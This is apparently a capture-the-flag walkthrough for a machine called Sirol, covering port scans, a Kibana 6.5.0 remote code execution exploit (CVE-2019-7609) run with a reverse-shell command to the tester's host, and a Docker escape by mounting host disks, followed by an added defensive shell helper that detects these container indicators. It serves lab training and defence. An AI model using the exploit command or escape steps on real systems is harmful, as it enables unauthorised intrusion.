# Sirol

## Information Gathering

`rustscan -a 192.168.241.54 --ulimit 5000`

![](/files/EaOdMwwg96XdqKjF6zm2)

`nmap -sC -sV --reason -p22,80,3306,5601,24007 192.168.241.54`

![](/files/r8seFlUrfBp7RapmCcLF)

### Service Enumeration

#### Kibana (Port 5601)

![](/files/rtfJxezOtBpuTFKGVopB)

Under the Management tab, we can find the version number of Kibana that is running.

![](/files/QFggApnvBurp5QTrPmVT)

## Exploit

Kibana version 6.5.0 is affected by CVE-2019-7609, an arbitrary code execution flaw in the Timelion visualizer.

{% embed url="<https://github.com/LandGrey/CVE-2019-7609>" %}

Payload: `python CVE-2019-7609-kibana-rce.py -u http://192.168.241.54:5601/ -host 192.168.49.241 -port 12345 --shell`

![](/files/MgljZDGQUKuTxUQ3r6Rx)

![](/files/wzbZi4F7Oy55jS4JwmWL)

## Privesc

While we are already the root user, the root directory doesn't seem to have what we are looking for.

![](/files/skO4alUu5a1s8LydbHAJ)

Notice that when we list the contents of the root directory, there is a `.dockerenv` file. This, along with the fact that our hostname is a string of alphanumeric characters, strongly suggests that we are inside a Docker container.

Using the command `fdisk -l`, we can see what other disks are attached to the machine.

We can then create a mount point for each disk and mount them.

![](/files/UtnqPTpQL7E7vfjpgLUa)

```
# One mount point per partition reported by fdisk -l
mkdir /mnt/sda1
mkdir /mnt/sda2
mkdir /mnt/sda5

# Mount each partition on its own mount point
mount /dev/sda1 /mnt/sda1
mount /dev/sda2 /mnt/sda2
mount /dev/sda5 /mnt/sda5
```

![](/files/SO6QQx3X2ZGe3qeISo1F)
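As an added example that is not part of the original writeup, the following POSIX shell helper checks, from the defender's side, the same indicators used above: the `.dockerenv` file, the hex hostname Docker assigns, and whether whole host disks are visible from inside the workload (the condition that makes the mount step above possible). The root-path and device-directory arguments are assumptions added so the checks can be run against a constructed directory tree.

```shell
#!/bin/sh
# Added audit helper (not from the original writeup): flags the container
# indicators the walkthrough relies on and reports whether host block devices
# are exposed to the container, which a defender should treat as a
# privileged workload that needs review.

# Docker sets the hostname to the first 12 hex characters of the container ID.
looks_like_container_hostname() {
    printf '%s\n' "$1" | grep -Eq '^[0-9a-f]{12}$'
}

# Returns 0 if any container indicator is found under root path $1
# (default "/") and prints each indicator found, one per line.
# The root-path argument is an assumption that makes the check testable.
container_indicators() {
    root="${1:-/}"
    root="${root%/}"
    found=0
    if [ -f "$root/.dockerenv" ]; then
        echo "dockerenv"; found=1
    fi
    if [ -r "$root/proc/1/cgroup" ] && grep -Eq '(docker|containerd|kubepods)' "$root/proc/1/cgroup"; then
        echo "cgroup"; found=1
    fi
    [ "$found" -eq 1 ]
}

# Lists disk device nodes visible in device directory $1 (default /dev).
# A properly isolated container prints nothing here; if whole host disks
# such as sda appear, the container was started with host device access
# and can reach the host filesystem the way the walkthrough does.
visible_block_devices() {
    devroot="${1:-/dev}"
    ls "$devroot" 2>/dev/null | grep -E '^(sd[a-z]|vd[a-z]|nvme[0-9]+n[0-9]+)[0-9]*$'
}
```

Run `container_indicators && visible_block_devices` inside a workload; any disk names printed are the finding to escalate.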
